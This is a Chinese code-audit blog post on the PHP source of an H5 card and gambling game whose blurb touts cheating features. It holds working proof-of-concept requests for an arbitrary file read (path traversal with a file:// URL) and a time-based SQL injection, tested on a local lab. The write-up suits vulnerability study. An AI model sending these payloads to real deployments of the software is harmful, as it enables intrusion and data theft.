【PHP代审】新版H5大圣棋牌游戏源码

admin
admin
admin
140643
文章
117
评论
2025年5月15日10:25:59评论1 views字数 2820阅读9分24秒阅读模式
【PHP代审】新版H5大圣棋牌游戏源码

点击上方蓝字·关注我们

免责声明
【PHP代审】新版H5大圣棋牌游戏源码

由于传播、利用本公众号菜狗安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号菜狗安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,会立即删除并致歉。

文章目录
【PHP代审】新版H5大圣棋牌游戏源码
项目介绍环境搭建代码审计    鉴权分析与前台文件寻找    前台任意文件读取    前台SQL注入最后 
2sdfs

项目介绍

新版H5大圣棋牌游戏源码+搭建教程+支持透视+座位控+防反杀

【PHP代审】新版H5大圣棋牌游戏源码
【PHP代审】新版H5大圣棋牌游戏源码

环境搭建

源码获取见文末

源码下载到本地,采用小皮搭建

【PHP代审】新版H5大圣棋牌游戏源码

然后设置apache伪静态

<IfModule mod_rewrite.c>  Options +FollowSymlinks -Multiviews  RewriteEngine On  RewriteCond %{REQUEST_FILENAME} !-d  RewriteCond %{REQUEST_FILENAME} !-f  RewriteRule ^(.*)$ index.php [L,E=PATH_INFO:$1]</IfModule>

修改数据库配置文件

文件:data/conf/db.php

【PHP代审】新版H5大圣棋牌游戏源码

创建对应数据库,导入sql文件

我这里没有配置前台h5,没办法演示前端页面,就正常审源码,部分需要普通用户登录的我会在代码中去掉登录验证代码然后复现漏洞

后台地址:ip:port/admin账户:admin密码:查看代码加密逻辑手动在数据库中修改
【PHP代审】新版H5大圣棋牌游戏源码

写个ehco,就可以知道登入后字符串加密的结果,复制在数据库中替换即可

代码审计

鉴权分析与前台文件寻找

基于ThinkCMF开发的后台,思路都一样

鉴权类:application/Common/Controller/AdminbaseController.class.php

【PHP代审】新版H5大圣棋牌游戏源码

上工具

【PHP代审】新版H5大圣棋牌游戏源码

前台任意文件读取

全局搜索file_get_contents方法

对应文件:

application/Portal/Controller/ThumbController.class.php

【PHP代审】新版H5大圣棋牌游戏源码

在第36行使用file_get_contents方法读取我们传入的$url,这里$url我们完全可控,接着使用file_put_contents把读取到的内容写入到$file_cache中,$file_cache在第23行定义,这里生成文件名的逻辑是固定的,也就是我们可以知道,可以读取任意文件把内容写到指定文件中

测试poc

POST /portal/Thumb/gd HTTP/1.1Host192.168.242.1:9969Accept-Language: zh-CN,zh;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36Referer: http://192.168.242.1:9969/admin/index/indexAccept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Content-Type: application/x-www-form-urlencodedContent-Length: 45height=caigo/../../../../..&url=file:///D:/test.txt&width=caigo
【PHP代审】新版H5大圣棋牌游戏源码
【PHP代审】新版H5大圣棋牌游戏源码

访问文件

【PHP代审】新版H5大圣棋牌游戏源码

前台sql注入

全局搜索where(

对应文件:application/Portal/Controller/HomeController.class.php

【PHP代审】新版H5大圣棋牌游戏源码

接口需要普通用户登录,没配置的话把鉴权代码注释即可

【PHP代审】新版H5大圣棋牌游戏源码

很明显的危险写法,556行执行where($where),$where在第555行定义,拼接了$wallet,这个变量直接传递,没有进行类型转换或者过滤,存在注入

测试poc:

POST /Portal/Home/checkMaxGetHelp HTTP/1.1Host192.168.242.1:9969Upgrade-Insecure-Requests: 1Referer: http://192.168.242.1:9969/admin/index/indexAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Cookie: VPFv3w_think_language=zh-CN; PHPSESSID=lg0v5neeeuuvvhi2sat5lj5073; VPFv3w_admin_username=adminContent-Type: application/x-www-form-urlencodedwallet=123') AND (SELECT 3133 FROM (SELECT(SLEEP(5)))MOQf) -- &money=123&days=123
【PHP代审】新版H5大圣棋牌游戏源码

sqlmap

【PHP代审】新版H5大圣棋牌游戏源码

后台还有多处注入,我就不演示了,感兴趣自己下去研究吧

最后

源码获取微信公众号回复"新版大圣H5"获取下载地址

提供的源码仅用于技术学习与研究个人代码审计能力提升,其他使用与作者【C@ig0】以及公众号【菜狗安全】无关,后果请自行承担!!!
有其它问题或者对文章内容有疑问的,技术交流也可以加新的交流群
【PHP代审】新版H5大圣棋牌游戏源码
公众号培训广告,有需要可联系
菜狗安全《代码审计》第①期它来了!!!
课程介绍视频
菜狗安全《代码审计》第①期培训介绍与答疑
https://www.bilibili.com/video/BV153VWzgEgq
比起公开课内容对小白更友好,讲解更细致,实战案例更新更多,预报名价格仅需999,一期包终身,心动不如行动,16号左右开课恢复原价1299
有需要或者有问题可以加微信,备注“培训”
【PHP代审】新版H5大圣棋牌游戏源码

原文始发于微信公众号(菜狗安全):【PHP代审】新版H5大圣棋牌游戏源码

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月15日10:25:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【PHP代审】新版H5大圣棋牌游戏源码https://cn-sec.com/archives/4066206.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息